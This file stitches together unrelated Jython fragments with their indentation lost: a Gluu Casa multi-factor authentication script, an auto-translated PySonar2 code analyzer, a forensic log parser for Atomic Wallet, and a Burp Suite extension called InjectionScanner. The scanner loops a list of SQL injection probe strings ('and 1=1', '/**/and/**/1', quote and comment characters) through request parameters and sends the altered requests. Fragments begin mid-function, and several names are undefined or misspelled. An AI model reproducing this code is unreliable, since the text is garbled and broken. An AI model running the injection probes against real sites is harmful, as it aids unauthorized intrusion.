print "Exception: ", sys.exc_info()[1]
print "Passport. attemptAuthentication. Authentication failed"
return False
if username == None:
print "Passport. attemptAuthentication. Authentication attempt was rejected"
return False
else:
logged_in = CdiUtil.bean(AuthenticationService).authenticate(
username)
print "Passport. attemptAuthentication. Authentication for %s returned %s" % (
username, logged_in)
return logged_in
def getFileErrs(self, file_, _map):
msgs = _map.get(file_)
if msgs is None:
msgs = ArrayList()
_map[file_] = msgs
return msgs
def authenticate(self, configurationAttributes, requestParameters, step):
print "Casa. authenticate %s" % str(step)
userService = CdiUtil.bean(UserService)
authenticationService = CdiUtil.bean(AuthenticationService)
identity = CdiUtil.bean(Identity)
if step == 1:
credentials = identity.getCredentials()
user_name = credentials.getUsername()
user_password = credentials.getPassword()
if StringHelper.isNotEmptyString(user_name) and StringHelper.isNotEmptyString(user_password):
foundUser = userService.getUserByAttribute(self.uid_attr, user_name)
#foundUser = userService.getUser(user_name)
if foundUser == None:
print "Casa. authenticate for step 1. Unknown username"
else:
platform_data = self.parsePlatformData(requestParameters)
mfaOff = foundUser.getAttribute("oxPreferredMethod") == None
logged_in = False
if mfaOff:
logged_in = authenticationService.authenticate(user_name, user_password)
else:
acr = self.getSuitableAcr(foundUser, platform_data)
if acr != None:
module = self.authenticators[acr]
logged_in = module.authenticate(module.configAttrs, requestParameters, step)
if logged_in:
foundUser = authenticationService.getAuthenticatedUser()
if foundUser == None:
print "Casa. authenticate for step 1. Cannot retrieve logged user"
else:
if mfaOff:
identity.setWorkingParameter("skip2FA", True)
else:
#Determine whether to skip 2FA based on policy defined (global or user custom)
skip2FA = self.determineSkip2FA(userService, identity, foundUser, platform_data)
identity.setWorkingParameter("skip2FA", skip2FA)
identity.setWorkingParameter("ACR", acr)
return True
else:
print "Casa. authenticate for step 1 was not successful"
return False
else:
user = authenticationService.getAuthenticatedUser()
if user == None:
print "Casa. authenticate for step 2. Cannot retrieve logged user"
return False
#see casa.xhtml
alter = ServerUtil.getFirstValue(requestParameters, "alternativeMethod")
if alter != None:
#bypass the rest of this step if an alternative method was provided. Current step will be retried (see getNextStep)
self.simulateFirstStep(requestParameters, alter)
return True
session_attributes = identity.getSessionId().getSessionAttributes()
acr = session_attributes.get("ACR")
#this working parameter is used in casa.xhtml
identity.setWorkingParameter("methods", ArrayList(self.getAvailMethodsUser(user, acr)))
success = False
if acr in self.authenticators:
module = self.authenticators[acr]
success = module.authenticate(module.configAttrs, requestParameters, step)
#Update the list of trusted devices if 2fa passed
if success:
print "Casa. authenticate. 2FA authentication was successful"
tdi = session_attributes.get("trustedDevicesInfo")
if tdi == None:
print "Casa. authenticate. List of user's trusted devices was not updated"
else:
user.setAttribute("oxTrustedDevicesInfo", tdi)
userService.updateUser(user)
else:
print "Casa. authenticate. 2FA authentication failed"
return success
return False
class Analyzer(object):
# global static instance of the analyzer itself
#self = Analyzer()
allBindings = ArrayList()
references = LinkedHashMap()
semanticErrors = HashMap()
parseErrors = HashMap()
cwd = None
nCalled = 0
multilineFunType = False
path = ArrayList()
uncalled = HashSet()
callStack = HashSet()
importStack = HashSet()
astCache = AstCache()
cacheDir = str()
failedToParse = HashSet()
stats = Stats()
builtins = None # Builtins()
logger = logging.getLogger(__name__)
loadingProgress = None
projectDir = str()
# below doesn't work for some reason....
"""
def init_vars(self):
self.allBindings = ArrayList()
self.references = LinkedHashMap()
self.semanticErrors = HashMap()
self.parseErrors = HashMap()
self.cwd = None
self.nCalled = 0
self.multilineFunType = False
self.path = ArrayList()
self.uncalled = HashSet()
self.callStack = HashSet()
self.importStack = HashSet()
self.astCache = AstCache()
self.cacheDir = str()
self.failedToParse = HashSet()
self.stats = Stats()
self.builtins = None # Builtins()
self.logger = logging.getLogger(__name__)
self.loadingProgress = None
self.projectDir = str()
"""
# singleton pattern
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super(Analyzer, cls).__new__(cls, *args, **kwargs)
return cls._instance
def __init__(self):
self.moduleTable = Scope(None, Scope.ScopeType.GLOBAL)
self.loadedFiles = ArrayList()
self.globaltable = Scope(None, Scope.ScopeType.GLOBAL)
import time
millis = int(round(time.time() * 1000))
self.stats.putInt("startTime", millis)
self.logger = logging.getLogger(__name__)
if not hasattr(Analyzer, 'self'):
setattr(Analyzer, 'self', self)
self.builtins = Builtins()
self.builtins.init()
#self.addPythonPath()
self.createCacheDir()
self.getAstCache()
# main entry to the analyzer
def analyze(self, path):
self.projectDir = _.unifyPath(path)
self.loadFileRecursive(self.projectDir)
def setCWD(self, cd):
if cd is not None:
self.cwd = cd
#if cd is not None:
# self.cwd = _.unifyPath(cd)
def addPaths(self, p):
for s in p:
addPath(s)
def addPath(self, p):
self.path.add(_.unifyPath(p))
def setPath(self, path):
self.path = ArrayList(len(path))
self.addPaths(path)
def addPythonPath(self):
path = System.getenv("PYTHONPATH")
if path is not None:
for p in segments:
self.addPath(p)
def getLoadPath(self):
loadPath = ArrayList()
if self.cwd is not None:
loadPath.append(self.cwd)
if self.projectDir is not None and os.path.isdir(self.projectDir):
loadPath.append(self.projectDir)
loadPath += self.path
return loadPath
def inStack(self, f):
return f in self.callStack
def pushStack(self, f):
self.callStack.add(f)
def popStack(self, f):
self.callStack.remove(f)
def inImportStack(self, f):
return f in self.importStack
def pushImportStack(self, f):
self.importStack.add(f)
def popImportStack(self, f):
self.importStack.remove(f)
def getAllBindings(self):
return self.allBindings
def getCachedModule(self, file_):
t = self.moduleTable.lookupType(_.moduleQname(file_))
if t is None:
return None
elif t.isUnionType():
for tt in t.asUnionType().getTypes():
if tt.isModuleType():
return tt
return None
elif t.isModuleType():
return t
else:
return None
def getDiagnosticsForFile(self, file_):
errs = self.semanticErrors.get(file_)
if errs is not None:
return errs
return ArrayList()
#@overloaded
def putRef(self, node, bs):
if not hasattr(bs, '__len__'):
bs = [bs]
if not (isinstance(node, (Url, ))):
ref = Ref(node)
bindings = self.references.get(ref)
if bindings is None:
bindings = ArrayList()
self.references[ref] = bindings
for b in bs:
if not b in bindings:
bindings.append(b)
b.addRef(ref)
def getReferences(self):
""" generated source for method getReferences """
return self.references
def putProblem(self, *args):
if len(args) == 2:
return self.putProblem0(*args)
else:
return self.putProblem1(*args)
#@overloaded
def putProblem0(self, loc, msg):
""" generated source for method putProblem """
file_ = loc.getFile()
if file_ is not None:
self.addFileErr(file_, loc.start, loc.end, msg)
# for situations without a Node
#@putProblem.register(object, str, int, int, str)
def putProblem1(self, file_, begin, end, msg):
""" generated source for method putProblem_0 """
if file_ is not None:
self.addFileErr(file_, begin, end, msg)
def addFileErr(self, file_, begin, end, msg):
""" generated source for method addFileErr """
d = Diagnostic(file_, Diagnostic.Category.ERROR, begin, end, msg)
self.getFileErrs(file_, self.semanticErrors).append(d)
def getParseErrs(self, file_):
return self.getFileErrs(file_, self.parseErrors)
def getFileErrs(self, file_, _map):
msgs = _map.get(file_)
if msgs is None:
msgs = ArrayList()
_map[file_] = msgs
return msgs
def loadFile(self, path):
_.msg("loading: " + path)
path = _.unifyPath(path)
if not os.path.isfile(path):
self.finer("\nfile not not found or cannot be read: " + path)
return None
module_ = self.getCachedModule(path)
if module_ is not None:
self.finer("\nusing cached module " + path + " [succeeded]")
return module_
# detect circular import
if Analyzer.self.inImportStack(path):
return None
# set new CWD and save the old one on stack
oldcwd = self.cwd
self.setCWD(os.path.join(*path.split(os.sep)[:-1]))
Analyzer.self.pushImportStack(path)
mod = self.parseAndResolve(path)
# restore old CWD
self.setCWD(oldcwd)
return mod
def isInLoadPath(self, dir):
for s in getLoadPath():
if File(s) == dir:
return True
return False
def parseAndResolve(self, file_):
self.finer("Analyzing: " + file_)
self.loadingProgress.tick()
try:
ast = self.getAstForFile(file_)
if ast is None:
self.failedToParse.add(file_)
return None
else:
self.finer("resolving: " + file_)
mod = ast.resolve(self.moduleTable)
assert isinstance(mod, ModuleType)
self.finer("[success]")
self.loadedFiles.append(file_)
return mod
except MemoryError as e:
if self.astCache is not None:
self.astCache.clear()
import gc
gc.collect()
return None
def createCacheDir(self):
""" generated source for method createCacheDir """
self.cacheDir = _.makePathString(_.getSystemTempDir(), "pysonar2",
"ast_cache")
f = self.cacheDir
_.msg("AST cache is at: " + self.cacheDir)
if not os.path.exists(f):
os.makedirs(f)
if not os.path.exists(f):
_.die("Failed to create tmp directory: " + self.cacheDir +
".Please check permissions")
def getAstCache(self):
""" generated source for method getAstCache """
if self.astCache is None:
self.astCache = AstCache.get()
return self.astCache.INSTANCE
#
# * Returns the syntax tree for {@code file}. <p>
#
def getAstForFile(self, file_):
return self.getAstCache().getAST(file_)
def getBuiltinModule(self, qname):
return self.builtins.get(qname)
def makeQname(self, names):
if _.isEmpty(names):
return ""
ret = ""
i = 0
while i < len(names) - 1:
ret += names[i].id + "."
i += 1
ret += names[len(names) - 1].id
return ret
#
# * Find the path that contains modname. Used to find the starting point of locating a qname.
# *
# * @param headName first module name segment
#
def locateModule(self, headName):
loadPath = self.getLoadPath()
for p in loadPath:
startDir = os.sep.join([p, headName])
initFile = _.joinPath(startDir, "__init__.py")
if os.path.exists(initFile):
return p
startFile = startDir + ".py"
if os.path.exists(startFile):
return p
return None
def loadModule(self, name, scope):
if _.isEmpty(name):
return None
from Binding import Binding
qname = self.makeQname(name)
mt = self.getBuiltinModule(qname)
if mt is not None:
scope.insert(
name[0].id,
Url(Builtins.LIBRARY_URL + mt.getTable().getPath() + ".html"),
mt, Binding.Kind.SCOPE)
return mt
# If there's more than one segment
# load the packages first
prev = None
startPath = self.locateModule(name[0].id)
if startPath is None:
return None
path = startPath
for i, n in enumerate(name):
path = os.sep.join([path, name[i].id])
initFile = _.joinPath(path, "__init__.py")
if os.path.isfile(initFile):
mod = self.loadFile(initFile)
if mod is None:
return None
if prev is not None:
prev.getTable().insert(name[i].id, name[i], mod,
Binding.Kind.VARIABLE)
else:
scope.insert(name[i].id, name[i], mod,
Binding.Kind.VARIABLE)
prev = mod
elif i == len(name) - 1:
startFile = path + ".py"
if os.path.isfile(startFile):
mod = self.loadFile(startFile)
if mod is None:
return None
if prev is not None:
prev.getTable().insert(name[i].id, name[i], mod,
Binding.Kind.VARIABLE)
else:
scope.insert(name[i].id, name[i], mod,
Binding.Kind.VARIABLE)
prev = mod
else:
return None
return prev
#
# * Load all Python source files recursively if the given fullname is a
# * directory; otherwise just load a file. Looks at file extension to
# * determine whether to load a given file.
#
def loadFileRecursive(self, fullname):
count = self.countFileRecursive(fullname)
if self.loadingProgress is None:
self.loadingProgress = FancyProgress(count, 50)
if os.path.isdir(fullname):
for root, dirs, files in os.walk(fullname):
for f in files:
self.loadFileRecursive(root + os.sep + f)
for d in dirs:
self.loadFileRecursive(root + os.sep + d)
else:
if fullname.endswith(".py"):
self.loadFile(fullname)
# count number of .py files
def countFileRecursive(self, fullname):
sum = 0
if os.path.isdir(fullname):
for root, dirs, files in os.walk(fullname):
for f in files:
sum += self.countFileRecursive(root + os.sep + f)
for d in dirs:
sum += self.countFileRecursive(root + os.sep + d)
else:
if fullname.endswith(".py"):
sum += 1
return sum
def finish(self):
""" generated source for method finish """
# progress.end();
_.msg("\nFinished loading files. " + str(self.nCalled) +
" functions were called.")
_.msg("Analyzing uncalled functions")
self.applyUncalled()
# mark unused variables
for b in self.allBindings:
if not b.getType().isClassType() and not b.getType().isFuncType(
) and not b.getType().isModuleType() and _.isEmpty(b.getRefs()):
Analyzer.self.putProblem(
b.getNode(), "Unused variable: " + b.__class__.__name__)
for ent in self.references.items():
self.convertCallToNew(ent[0], ent[1])
_.msg(self.getAnalysisSummary())
def close(self):
""" generated source for method close """
self.astCache.close()
def convertCallToNew(self, ref, bindings):
""" generated source for method convertCallToNew """
if ref.isRef():
return
if len(bindings) == 0:
return
nb = bindings[0]
t = nb.getType()
if t.isUnionType():
t = t.asUnionType().firstUseful()
if t is None:
return
if not t.isUnknownType() and not t.isFuncType():
ref.markAsNew()
def addUncalled(self, cl):
""" generated source for method addUncalled """
if not cl.func.called:
self.uncalled.add(cl)
def removeUncalled(self, f):
if f in self.uncalled: self.uncalled.remove(f)
def applyUncalled(self):
""" generated source for method applyUncalled """
progress = FancyProgress(len(self.uncalled), 50)
while not _.isEmpty(self.uncalled):
uncalledDup = list(self.uncalled)
for cl in uncalledDup:
progress.tick()
Call.apply(cl, None, None, None, None, None)
def getAnalysisSummary(self):
sb = []
sb.append("\n" + _.banner("analysis summary"))
duration = _.formatTime(_.millis() - self.stats.getInt("startTime"))
sb.append("\n- total time: " + duration)
sb.append("\n- modules loaded: " + str(len(self.loadedFiles)))
sb.append("\n- semantic problems: " + str(len(self.semanticErrors)))
sb.append("\n- failed to parse: " + str(len(self.failedToParse)))
# calculate number of defs, refs, xrefs
nDef = 0
nXRef = 0
for b in self.getAllBindings():
nDef += 1
nXRef += len(b.getRefs())
sb.append("\n- number of definitions: " + str(nDef))
sb.append("\n- number of cross references: " + str(nXRef))
sb.append("\n- number of references: " +
str(len(self.getReferences())))
resolved = self.stats.getInt("resolved")
unresolved = self.stats.getInt("unresolved")
sb.append("\n- resolved names: " + str(resolved))
sb.append("\n- unresolved names: " + str(unresolved))
sb.append("\n- name resolve rate: " +
_.percent(resolved, resolved + unresolved))
sb.append("\n" + _.getGCStats())
return ''.join(sb)
def getLoadedFiles(self):
files = ArrayList()
for file_ in self.loadedFiles:
if file_.endswith(".py"):
files.append(file_)
return files
def registerBinding(self, b):
self.allBindings.append(b)
def log(self, level, msg):
_.msg(msg)
def severe(self, msg):
self.log(Level.SEVERE, msg)
def warn(self, msg):
self.log(Level.WARNING, msg)
def info(self, msg):
self.log(Level.INFO, msg)
def fine(self, msg):
self.log(Level.FINE, msg)
def finer(self, msg):
self.log('*a log level*', msg)
def __str__(self):
return "<Analyzer:locs=" + len(self.references) + ":probs=" + len(
self.semanticErrors) + ":files=" + len(self.loadedFiles) + ">"
def processConnectionLogs(self, logFile, abstractFile):
moduleName = AttomicWalletIngestModuleFactory.moduleName
connectTimes = []
disconnectTimes = []
with open(logFile) as file:
for logLine in file:
if "connected" in logLine:
logLineList = logLine.split(" ")
connectTimes.append(int(self.getDateTime(logLineList[0], logLineList[1])))
elif "Disconnect" in logLine:
logLineList = logLine.split(" ")
disconnectTimes.append(int(self.getDateTime(logLineList[0], logLineList[1])))
else:
pass
try:
artId = self.createArtifact("TSK_ATOMIC_WALLET_APP_TIMES", "Atomic Wallet Connect/Disconnect Times")
for connTime in connectTimes:
artifact = abstractFile.newArtifact(artId)
attributes = ArrayList()
attId = self.createAttribute("TSK_ATOMIC_WALLET_CONNECTION_TYPE", "string", "Atomic Wallet Connection Type")
attributes.add(BlackboardAttribute(attId, moduleName, "Connect"))
attId = self.createAttribute("TSK_ATOMIC_WALLET_TIME", "datetime", "Atomic Wallet Time")
attributes.add(BlackboardAttribute(attId, moduleName, connTime))
try:
artifact.addAttributes(attributes)
except:
self.log(Level.INFO, "Error adding attribute to artifact")
try:
self.indexArtifact(artifact)
except:
self.log(Level.INFO, "Error indexing artifact")
for disTime in disconnectTimes:
artifact = abstractFile.newArtifact(artId)
attributes = ArrayList()
attId = self.createAttribute("TSK_ATOMIC_WALLET_CONNECTION_TYPE", "string", "Atomic Wallet Connection Type")
attributes.add(BlackboardAttribute(attId, moduleName, "Disconnect"))
attId = self.createAttribute("TSK_ATOMIC_WALLET_TIME", "datetime", "Atomic Wallet Time")
attributes.add(BlackboardAttribute(attId, moduleName, disTime))
try:
artifact.addAttributes(attributes)
except:
self.log(Level.INFO, "Error adding attribute to artifact")
try:
self.indexArtifact(artifact)
except:
self.log(Level.INFO, "Error indexing artifact")
except:
self.log(Level.INFO, "Error adding attribute")
class BurpExtender(IBurpExtender, IContextMenuFactory, ITab,
IExtensionStateListener, IMessageEditorController,
IHttpListener):
'''
IBurpExtender: Hook into burp and inherit base classes
ITab: Create new tabs inside burp
IMessageEditorTabFactory: Access createNewInstance
'''
def registerExtenderCallbacks(self, callbacks):
# Set encoding to utf-8 to avoid some errors
reload(sys)
sys.setdefaultencoding('utf8')
# Keep a reference to callback object and helper object
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
# Set the extension name that shows in the burp extension menu
callbacks.setExtensionName("InjectionScanner")
# Create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._logLock = Lock()
self._httpLock = Lock()
# The length of the basis used to fetch abnormal data, default to zero
self._basisLen = 0
# 1: {POST. GET}; 2: {urlencoded, json, xml}
self._postGet = 'NaN'
self._dataType = 'NaN'
# Scan list
self._simpleList = [
'\'', '\"', '/', '/*', '#', ')', '(', ')\'', '(\'', 'and 1=1',
'and 1=2', 'and 1>2', 'and 12', '+', 'and+12', '/**/and/**/1'
]
self._xmlList = ['a', 'b', 'c', 'd', 'e'] # Not setted
# Response mutex: True = is blocking; False = free to go
# self._mutexR = False
# Other classes instance
self._dataTable = Guis_DefaultTM()
self._logTable = Guis_AbstractTM(self)
self._xh = XMLHandler()
listeners = Guis_Listeners(self, self._logTable)
'''
Setting GUIs
'''
# Divide the whole pane two: one upper and one lower pane
self._mainSplitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
self._mainSplitpane.setResizeWeight(0.4)
# Initizlize request table
dataTable = JTable(self._dataTable)
dataScrollPane = JScrollPane(dataTable)
dataScrollPane.setPreferredSize(Dimension(0, 125))
self._dataTable.addTableModelListener(listeners)
# Initialize log table
logTable = Guis_LogTable(self._logTable)
logScrollPane = JScrollPane(logTable)
logScrollPane.setPreferredSize(Dimension(0, 125))
# Split the upper pane to two panes
tableSplitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
tableSplitpane.setResizeWeight(0.5)
# Set the data table to the left and log to the right
tableSplitpane.setLeftComponent(dataScrollPane)
tableSplitpane.setRightComponent(logScrollPane)
# Tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
# Create buttons that do operation with the test
self._basisLabel = JLabel('Basis: ' + str(self._basisLen))
self._levelLabel = JLabel('Level:')
self._setBasisButton = JButton('Set Basis')
self._hitOnceButton = JButton('Hit Once')
self._autoScanButton = JButton('Auto Scan')
self._clearLogButton = JButton('Clear Log')
self._cancelButton = JButton('Cancel')
self._levelSelection = JComboBox()
self._levelSelection.addItem('1')
self._levelSelection.addItem('2')
self._levelSelection.addItem('3')
self._hitOnceButton.addActionListener(listeners)
self._autoScanButton.addActionListener(listeners)
self._clearLogButton.addActionListener(listeners)
self._setBasisButton.addActionListener(listeners)
self._cancelButton.addActionListener(listeners)
self._basisLabel.setPreferredSize(Dimension(100, 20))
# Create bottom pane for holding the buttons
buttonPane = JPanel()
buttonPane.setLayout(BorderLayout())
centerPane = JPanel()
leftPane = JPanel()
rightPane = JPanel()
leftPane.add(self._basisLabel)
centerPane.add(self._setBasisButton)
centerPane.add(self._hitOnceButton)
centerPane.add(self._autoScanButton)
centerPane.add(self._cancelButton)
centerPane.add(self._clearLogButton)
rightPane.add(self._levelLabel)
rightPane.add(self._levelSelection)
buttonPane.add(centerPane, BorderLayout.CENTER)
buttonPane.add(leftPane, BorderLayout.WEST)
buttonPane.add(rightPane, BorderLayout.EAST)
# Create and set the bottom panel that holds viewers and buttons
utilPane = JPanel()
utilPane.setLayout(BorderLayout())
utilPane.add(tabs, BorderLayout.CENTER)
utilPane.add(buttonPane, BorderLayout.SOUTH)
self._mainSplitpane.setLeftComponent(tableSplitpane)
self._mainSplitpane.setRightComponent(utilPane)
# Customize UI components
callbacks.customizeUiComponent(self._mainSplitpane)
callbacks.customizeUiComponent(dataTable)
callbacks.customizeUiComponent(dataScrollPane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(logScrollPane)
callbacks.customizeUiComponent(tabs)
callbacks.customizeUiComponent(buttonPane)
callbacks.customizeUiComponent(utilPane)
callbacks.customizeUiComponent(self._basisLabel)
callbacks.customizeUiComponent(self._setBasisButton)
callbacks.customizeUiComponent(self._hitOnceButton)
callbacks.customizeUiComponent(self._autoScanButton)
callbacks.customizeUiComponent(self._clearLogButton)
callbacks.customizeUiComponent(self._levelSelection)
callbacks.customizeUiComponent(self._cancelButton)
# Add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# Register the context menu and message editor for new tabs
callbacks.registerContextMenuFactory(self)
# Register as a HTTP listener
callbacks.registerHttpListener(self)
return
'''
ITab implementation
'''
def getTabCaption(self):
return 'InjectionScanner'
def getUiComponent(self):
return self._mainSplitpane
'''
IContextMenuFactory implementation
'''
def createMenuItems(self, invocation):
menu = []
# Which part of the interface the user selects
ctx = invocation.getInvocationContext()
# Message viewer request will show menu item if selected by the user
if ctx == 0 or ctx == 2:
menu.append(
swing.JMenuItem("Send to InjectionScanner",
None,
actionPerformed=lambda x, inv=invocation: self.
sendToExtender(inv)))
return menu if menu else None
'''
IMessageEditorController Implementation
'''
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
'''
IHttpListener implementation
'''
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# Skip this function if the message is request
if messageIsRequest:
return
# Lock the log entry in case race condition
self._logLock.acquire()
row = self._log.size()
# Fetch request message
requestBody = messageInfo.getRequest()
requestInfo = self._helpers.analyzeResponse(requestBody)
requestHeaders = requestInfo.getHeaders()
if self._postGet == 'POST':
requestData = self._helpers.bytesToString(
requestBody[requestInfo.getBodyOffset():])
elif self._postGet == 'GET':
for header in requestHeaders:
if 'GET' in header:
# If the request is GET, update the GET data
requestUrl = re.sub('^GET\s+', '', header, re.IGNORECASE)
requestUrl = re.sub('\sHTTP/1.1\S*', '', requestUrl,
re.IGNORECASE)
if '?' in requestUrl:
requestData = re.sub('\S*\?', '', requestUrl,
re.IGNORECASE)
else:
print('processHttpMessage: no parameter in GET url')
else:
print('processHttpMessage: _postGet not defined')
self._logLock.release()
return
# Fetch the http type (GET/POST)
httpType = requestHeaders[0].split(' ')
# Fetch response message
responseBody = messageInfo.getResponse()
responseInfo = self._helpers.analyzeResponse(responseBody)
responseHeaders = responseInfo.getHeaders()
self._responseLength = ''
# Fetch the content length
self._responseLength = self.fetchContentLength(responseHeaders)
# If the response message is auto-generated, ignore it. If not, add it into the log list
if self._callbacks.getToolName(toolFlag) != 'Proxy':
self._log.add(
LogEntry(httpType[0], requestData,
self._callbacks.saveBuffersToTempFiles(messageInfo),
self._responseLength))
self._logTable.fireTableRowsInserted(row, row)
self._logLock.release()
'''
Fetch content length from the headers given
'''
def fetchContentLength(self, fromHeaders):
for header in fromHeaders:
if re.search('^Content-Length', header, re.IGNORECASE) is not None:
return re.sub('^Content-Length\:\s+', '', header,
re.IGNORECASE)
'''
When the user select 'Send to InjectionScanner', call this function
'''
def sendToExtender(self, invocation):
# Init/reset request data before sending to extender
self.initRequestInfo()
try:
# Initialize basic information
invMessage = invocation.getSelectedMessages()
requestMessage = invMessage[0]
requestInfo = self._helpers.analyzeRequest(requestMessage)
self._requestBody = requestMessage.getRequest()
# Set the _currentlyDisplayedItem so each time the data is sent to the extender
self._currentlyDisplayedItem = self._callbacks.saveBuffersToTempFiles(
requestMessage)
# Fetch the request data
bodyLen = len(self._helpers.bytesToString(self._requestBody))
if requestInfo.getBodyOffset() < bodyLen:
self._requestData = self._helpers.bytesToString(
self._requestBody[requestInfo.getBodyOffset():])
elif requestInfo.getBodyOffset() == bodyLen:
self._requestData = ''
else:
print('sendToExtender: body length < body offset')
# Fetch the headers and Http service
requestHeaders = list(requestInfo.getHeaders())
self._httpService = requestMessage.getHttpService()
# Initialize POST/GET identifier and User-Agent
for header in requestHeaders:
if re.search('^POST', header, re.IGNORECASE) is not None:
self._postGet = 'POST'
elif re.search('^GET', header, re.IGNORECASE) is not None:
self._postGet = 'GET'
# If the request is GET, initialize the url and GET data
self._requestUrl = re.sub('^GET\s+', '', header,
re.IGNORECASE)
self._requestUrl = re.sub('\sHTTP/1.1\S*', '',
self._requestUrl, re.IGNORECASE)
if '?' in self._requestUrl:
self._requestDataGet = re.sub('\S*\?', '',
self._requestUrl,
re.IGNORECASE)
else:
print('sendToExtender: no parameter in GET url')
# If the request if POST, fetch the request data type by content type
if self._postGet == 'POST' and re.search(
'^Content-Type', header, re.IGNORECASE) is not None:
contentType = re.sub('^Content-Type', '', header,
re.IGNORECASE)
if 'urlencoded' in contentType:
self._dataType = 'urlencoded'
elif 'json' in contentType:
self._dataType = 'json'
elif 'xml' in contentType or 'http' in conentType:
self._dataType = 'xml'
else:
print(
'sendToExtender: _dataType is not supported, do not scan'
)
# Initialze the User-Agent if it exists
if re.search('^User-Agent', header, re.IGNORECASE) is not None:
self._userAgent = re.sub('^User-Agent\:\s+', '', header,
re.IGNORECASE)
# If there's no content type in the header,fetch from data
if self._postGet == 'POST' and self._dataType == '':
if self._requestData != '':
if self._requestData[
0] == '{' and '}' in self._requestData and ':' in self._requestData:
self._dataType = 'json'
elif self._requestData[0] == '<' and self._requestData[
-1] == '>':
self._dataType = 'xml'
else:
self._dataType = 'urlencoded'
else:
print(
'sendToExtender: _postGet is POST but _requestData is null'
)
# Clear the table before adding elements
self._dataTable.setRowCount(0)
# Update request viewer
self.updateRequestViewer()
# Fill request data
self.fillRequestData()
except Exception as e:
print(e)
'''
Fill the data into the request table
'''
def fillRequestData(self):
# If _postGet is GET, also adds URL to the table
if self._postGet == 'GET':
dataList = self._requestDataGet.split('&')
for data in dataList:
if '=' in data:
x = data.split('=', 1)
self._dataDict[str(x[0])] = str(x[1])
self._dataTable.addRow([str(x[0]), str(x[1])])
self._dataLen += 1
self._dataTable.addRow(['URL', self._requestUrl])
self._UrlRow = self._dataLen
if self._userAgent != '':
self._dataTable.addRow(['User-Agent', self._userAgent])
elif self._postGet == 'POST':
if self._dataType == 'urlencoded':
dataList = self._requestData.split('&')
for data in dataList:
if '=' in data:
x = data.split('=', 1)
self._dataDict[str(x[0])] = str(x[1])
self._dataTable.addRow([str(x[0]), str(x[1])])
self._dataLen += 1
elif self._dataType == 'json':
self._dataDict = json.loads(self._requestData)
for key in self._dataDict:
# Convert '"' to '\"' to be the same as that in the data
value = str(self._dataDict[key])
if '\"' in value:
value = value.replace('\"', '\\\"')
self._dataDict[key] = value
self._dataTable.addRow([str(key), self._dataDict[key]])
self._dataLen += 1
elif self._dataType == 'xml':
# Use xml package to convert the xml string to dict
# Note1: the xml dict will be in reverse order
# Note2: the arrtibute will also be added into dict, need to be pop
# Note3: special characters like \" will be considered as "
xml.sax.parseString(self._requestData, self._xh)
self._attr = re.sub('\>(\S*\s*)*', '', self._requestData[1:],
re.IGNORECASE)
self._dataDict = self._xh.getDict()
self._dataDict.pop(self._attr)
for key in self._dataDict:
self._dataTable.addRow(
[str(key), str(self._dataDict[key])])
self._dataLen += 1
else:
print('fillRequestData: _dataType not defined')
if self._userAgent != '':
self._dataTable.addRow(['User-Agent', self._userAgent])
self._savedUserAgent = self._userAgent
else:
print('fillRequestData: _postGet not defined')
'''
Receive & update the response after sending request to the server
'''
def receiveResponse(self):
# Init/reset response data before receiving response
self.initResponseInfo()
# Launch the http thread
self._httpThread = Thread(target=self.makeRequest,
args=(
self._httpService,
self._requestBody,
))
self._httpThread.start()
'''
Make Http request to a service
'''
def makeRequest(self, httpService, requestBody):
self._httpLock.acquire()
# Disable the hit buttons before starting the thread
self._hitOnceButton.setEnabled(False)
self._autoScanButton.setEnabled(False)
self._responseMessage = self._callbacks.makeHttpRequest(
httpService, requestBody)
# Enable the hit buttons
self._hitOnceButton.setEnabled(True)
self._autoScanButton.setEnabled(True)
# Unblock the mutex
self._httpLock.release()
'''
updateRequestViewer
'''
def updateRequestViewer(self):
self._requestViewer.setMessage(self.getRequest(), True)
'''
updateResponseViewer
'''
def updateResponseViewer(self):
self._responseViewer.setMessage(self.getResponse(), False)
'''
Level 1 auto: only loop through the data, do not modify the 'submit' section
'''
def autoScan1(self):
# TODO: Add a 'cancel' button to stop when the user think it takes too long
# TODO: Add XML support
if self._postGet == 'GET':
for i in range(0, self._dataLen):
title = self._dataTable.getValueAt(i, 0)
baseValue = self._dataDict[title]
for value in self._simpleList:
# TODO: update more value that should not be changed
if 'submit' not in title.lower(
) and 'submit' not in self._dataDict[title].lower(
) and 'search' not in title.lower(
) and 'search' not in self._dataDict[title].lower():
# Update the table in case the loop interrupt in the middle
# Note that the URL will be automatically updated due to this code, so no need to manually update the URL section
self._dataTable.setValueAt(value, i, 1)
# Send & request the HTTP request/response
self.updateRequestViewer()
self.receiveResponse()
# Reset the table
self._dataTable.setValueAt(baseValue, i, 1)
if self._postGet == 'POST':
if self._dataType == 'urlencoded' or self._dataType == 'json':
for i in range(0, self._dataLen):
title = self._dataTable.getValueAt(i, 0)
baseValue = self._dataDict[title]
if 'submit' in title.lower() or 'submit' in self._dataDict[
title].lower() or 'search' in title.lower(
) or 'search' in self._dataDict[title].lower():
continue
for value in self._simpleList:
self._dataTable.setValueAt(value, i, 1)
self.updateRequestViewer()
self.receiveResponse()
# Reset the table
self._dataTable.setValueAt(baseValue, i, 1)
elif self._dataType == 'xml':
for i in range(0, self._dataLen):
title = self._dataTable.getValueAt(i, 0)
baseValue = self._dataDict[title]
for value in self._xmlList:
# Update the table in case the loop interrupt in the middle
self._dataTable.setValueAt(value, i, 1)
# Send & request the HTTP request/response
self.updateRequestViewer()
self.receiveResponse()
# Reset the table
self._dataTable.setValueAt(baseValue, i, 1)
'''
Level 2 auto: loop through the data as well as the user agent (if exist)
'''
def autoScan2(self):
# If the User-Agent does not exist, only performs level 1 auto
if self._userAgent != '':
baseUserAgent = self._userAgent
